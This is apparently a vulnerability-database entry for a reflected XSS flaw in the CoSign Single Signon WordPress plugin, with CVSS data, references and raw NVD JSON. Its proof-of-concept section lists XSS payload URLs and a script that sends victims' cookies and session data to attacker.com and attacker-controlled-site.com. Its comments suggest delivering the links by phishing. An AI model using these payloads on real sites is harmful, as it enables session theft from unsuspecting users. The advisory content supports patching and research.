CVE-2025-13512

Description

The CoSign Single Signon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CoSign Single Signon WordPress插件 <= 0.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-13512 PoC - CoSign SSO Reflected XSS -->
<!-- 攻击者构造的恶意链接示例 -->
<!-- 将以下链接通过钓鱼等方式诱导受害者点击 -->

<!-- 基础XSS PoC -->
https://target-site.com/wp-admin/admin.php/\"><script>alert('XSS')</script>

<!-- 窃取Cookie的XSS PoC -->
https://target-site.com/wp-admin/admin.php/\"><script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- 绕过过滤的变形XSS -->
https://target-site.com/wp-admin/admin.php/\"><img src=x onerror=alert(document.domain)>

<!-- 实际利用代码示例 -->
<script>
// 窃取用户会话信息
var sessionData = {
    cookies: document.cookie,
    url: window.location.href,
    userAgent: navigator.userAgent
};

// 发送到攻击者控制的服务器
fetch('https://attacker-controlled-site.com/log?data=' + btoa(JSON.stringify(sessionData)));
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13512
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13512
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13512/
[4] VulDB https://vuldb.com/cve/CVE-2025-13512
[5] https://plugins.trac.wordpress.org/browser/cosign-sso/tags/0.3.1/cosign-sso.php#L423
[6] https://plugins.trac.wordpress.org/browser/cosign-sso/trunk/cosign-sso.php#L423
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/0bbeab52-59a9-4d8d-8e3e-ebcbbca9816b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13512", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:07.727", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CoSign Single Signon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/cosign-sso/tags/0.3.1/cosign-sso.php#L423", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cosign-sso/trunk/cosign-sso.php#L423", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bbeab52-59a9-4d8d-8e3e-ebcbbca9816b?source=cve", "source": "[email protected]"}]}}